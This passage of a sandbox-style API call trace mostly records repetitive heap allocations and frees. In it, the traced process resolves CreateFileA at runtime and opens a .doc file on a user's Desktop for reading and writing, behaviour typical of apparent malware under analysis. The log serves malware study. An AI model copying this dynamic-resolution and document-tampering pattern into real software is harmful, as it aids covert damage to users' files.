hHeap=0x770000) returned 1 [0031.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0031.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0031.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0031.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0031.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0031.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0031.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0031.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0031.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0031.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0031.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0031.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0031.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.095] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0031.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cef8 [0031.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cef8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0031.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0031.096] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0031.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cef8 [0031.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cef8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0031.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0031.096] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0031.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0031.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0031.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0031.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc", cchWideChar=79, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 79 [0031.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4f) returned 0x7f3630 [0031.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc", cchWideChar=79, lpMultiByteStr=0x7f3630, cbMultiByte=79, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc", lpUsedDefaultChar=0x0) returned 79 [0031.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0031.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.097] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\haqrv lvwyhv.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0031.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0031.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0031.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0031.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0031.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=79, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0031.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x9e) returned 0x7d8558 [0031.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=79, lpWideCharStr=0x7d8558, cchWideChar=79 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc") returned 79 [0031.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0031.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0031.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0031.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0031.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0031.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0031.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0031.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0031.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0031.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0031.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0031.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0031.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0031.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0031.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0031.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0031.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0031.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0031.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0031.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0031.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0031.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0031.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0031.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0031.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0031.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0031.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0031.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0031.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0031.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.099] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0031.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0031.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0031.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.101] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0031.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0031.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0031.101] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0031.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0031.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0031.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0031.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 